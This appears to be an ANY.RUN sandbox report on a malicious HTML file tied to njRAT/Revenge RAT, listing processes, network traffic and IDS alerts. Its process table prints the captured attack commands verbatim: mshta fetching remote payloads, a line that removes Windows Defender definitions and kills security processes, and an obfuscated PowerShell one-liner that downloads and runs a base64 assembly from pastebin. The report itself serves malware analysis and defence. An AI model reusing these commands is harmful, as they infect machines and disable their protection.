download: | SmexEaldos10 |
Full analysis: | https://app.any.run/tasks/1427c025-57a5-4aef-b0c6-5a8d2a71f20e |
Verdict: | Malicious activity |
Threats: | Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. |
Analysis date: | April 15, 2019, 03:16:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/html |
File info: | HTML document, ASCII text, with very long lines |
MD5: | 0933AB09283FEA21D2411577B19336AA |
SHA1: | EDFA38D279D0C384E21A0F5E73EBDD24DB1149E3 |
SHA256: | 6B5D81A0CAF84433CCA53CC20645396DDACBE929524EF5B6A22CEC25ACDB0D03 |
SSDEEP: | 768:QEijZeqLNlEijZeqL+3NorxnMMTP8vuVrwF22Sgc:QEijZeqLbEijZeqLiMxnMaP8MrwFo |
.html | | | HyperText Markup Language (100) |
---|
Title: | bulkemailsender: chromosx2 |
---|---|
Generator: | blogger |
ContentType: | text/html; charset=UTF-8 |
viewport: | width=1100 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1700 | "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\SmexEaldos10.html | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3000 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1700 CREDAT:79873 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
856 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3804 | mshta.exe | C:\Windows\system32\mshta.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3332 | mshta.exe http://bit;y.com/SmexEaldos10 | C:\Windows\system32\mshta.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3084 | mshta.exe http://bitly.com/SmexEaldos10 | C:\Windows\system32\mshta.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3540 | "C:\Windows\System32\mshta.exe" http://pastebin.com/raw/0c9cC2iM | C:\Windows\System32\mshta.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2568 | "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c "taskkill /f /im MSASCuiL.exe" & forfiles /c "taskkill /f /im MpCmdRun.exe" & exit | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3620 | MpCmdRun.exe -removedefinitions -dynamicsignatures | C:\Program Files\Windows Defender\MpCmdRun.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Malware Protection Command Line Utility Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3732 | "C:\Windows\System32\mshta.exe" vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/'+'sgawvit9'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) | C:\Windows\System32\mshta.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3000 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\authorization[1].css | — | |
MD5:— | SHA256:— | |||
1700 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
1700 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3000 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\navbar[1].g | — | |
MD5:— | SHA256:— | |||
3000 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@google[1].txt | text | |
MD5:BDF86FEF9561CA61EBDFEDE927CD3DD7 | SHA256:9D4EA18E660E227DEBB92C365D0D59F95AC4463B527E9204170AFE40F354F177 | |||
3000 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\cb=gapi[1].loaded_1 | text | |
MD5:B351DD47632A93D14124239388608076 | SHA256:78273316C41942E4B37AD995598C16C907CE75701DBB3E48E5F32553CE643070 | |||
3000 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\3597120983-css_bundle_v2[1].css | text | |
MD5:AC004AD1EAFC60B54FED8371C9C33FBC | SHA256:869176CAB64C36F92C6C1F8FFBE85919575D6B9995A54850E5925289F3A75078 | |||
3000 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\1953397912-ieretrofit[1].js | text | |
MD5:FD3960146893B266DD12A9235E88FEFF | SHA256:42EA5004B2988BF19F7FDA7000A474897452055986A0A7D39888BA17E32F1424 | |||
3000 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\457480341-comment_from_post_iframe[1].js | html | |
MD5:21F67DC65A7B6EA50D7BEC6FA95C4150 | SHA256:5D72290D51D8FBC626CF8A5661AAE06F44B30CAD885BB1AE2A7F9024A0B9FEBE | |||
3000 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\plusone[1].js | html | |
MD5:F3B306BFBB3A9D3DB4A8F9971081BB31 | SHA256:E5725DFD2A86729D12FC0265D9AD7DF743FE9B0AA75F7E80DC9D995DE052C8BA |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3540 | mshta.exe | GET | 200 | 104.20.209.21:80 | http://pastebin.com/raw/0c9cC2iM | US | html | 1.82 Kb | shared |
3084 | mshta.exe | GET | 301 | 67.199.248.14:80 | http://bitly.com/SmexEaldos10 | US | html | 148 b | shared |
1700 | iexplore.exe | GET | 200 | 13.107.21.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1700 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
4 | System | 216.58.207.65:139 | themes.googleusercontent.com | Google Inc. | US | whitelisted |
1700 | iexplore.exe | 13.107.21.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
4 | System | 216.58.207.65:445 | themes.googleusercontent.com | Google Inc. | US | whitelisted |
3000 | iexplore.exe | 172.217.18.105:443 | www.blogger.com | Google Inc. | US | suspicious |
3000 | iexplore.exe | 172.217.16.142:443 | apis.google.com | Google Inc. | US | whitelisted |
4 | System | 216.58.206.2:445 | pagead2.googlesyndication.com | Google Inc. | US | whitelisted |
3084 | mshta.exe | 216.58.207.65:443 | themes.googleusercontent.com | Google Inc. | US | whitelisted |
3084 | mshta.exe | 172.217.18.105:443 | www.blogger.com | Google Inc. | US | suspicious |
3084 | mshta.exe | 67.199.248.14:80 | bitly.com | Bitly Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
www.blogger.com |
| shared |
www.bing.com |
| whitelisted |
apis.google.com |
| whitelisted |
resources.blogblog.com |
| whitelisted |
themes.googleusercontent.com |
| whitelisted |
pagead2.googlesyndication.com |
| whitelisted |
dns.msftncsi.com |
| shared |
bitly.com |
| shared |
miganshumaratamoligossa.blogspot.com |
| whitelisted |
pastebin.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3084 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
3540 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
2272 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
2272 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response |
2272 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response |
2272 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response |
2272 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response |
2272 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response |
2272 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response |